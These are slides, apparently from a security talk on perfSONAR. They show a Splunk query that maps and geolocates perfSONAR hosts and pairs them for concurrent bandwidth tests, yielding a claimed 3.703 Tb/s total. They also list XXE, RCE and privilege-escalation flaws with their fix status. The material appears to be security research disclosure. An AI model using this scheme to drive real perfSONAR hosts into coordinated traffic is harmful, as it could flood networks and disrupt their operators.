  • 54. CALCULATING ACTUAL NETWORK SPEED ➤ Enumerate all perfSONAR instances and their maximum interface speed ➤ Calculate instance location from GeoIP ➤ Match 5 closest instances of same or faster interface speed
  • 55. CALCULATING ACTUAL NETWORK SPEED ➤ index=ps sourcetype=ps-summary | dedup ls_client_uuid | rename external_address.address as address, external_address.speed as speed, services{}.enabled as enabled | where mvindex(enabled,0)="1" | fillnull value=10000000000 speed | iplocation address | map maxsearches=100000 search="search index=ps sourcetype=ps-summary | dedup ls_client_uuid | rename services{}.enabled as peer_enabled | eval peer_enabled = mvindex(peer_enabled,0) | where peer_enabled="1" | eval address=$address$, speed=$speed$ | rename external_address.address as peer_address, external_address.speed as peer_speed | fillnull value=10000000000 peer_speed | where peer_address!=address AND peer_speed >= speed | eval lat=$lat$, lon=$lon$ | iplocation prefix=peer_ peer_address | eval distance=sqrt(pow(lat-peer_lat,2)+pow(lon-peer_lon,2)) | where distance!=0 | sort distance | head 5 | fields address, speed, peer_address, peer_speed, distance" | table address, speed, peer_address, peer_speed, distance
  • 56. CALCULATING ACTUAL NETWORK SPEED ➤ Never run 2 tests with the same instance at the same time ➤ Never run more than 10 tests at the same time ➤ Never test a host that doesn’t have bwctl enabled
  • 57. PERFSONAR ACTUAL NETWORK SPEED 3.703 Tb/s
  • 59. CONCLUSION ➤ oppd (XXE) - unresolved ➤ bandwidthGraph.cgi (RCE) - fixed by perfSONAR 3.5.1 on March 3rd ➤ ConfigDaemon (PrivEsc) - unresolved
  • 60. CONCLUSION ➤ GitHub: http://www.github.com/bored-engineer ➤ Email: me@bored.engineer ➤ LinkedIn: https://www.linkedin.com/in/bored-engineer ➤ Twitter: @TheBoredEng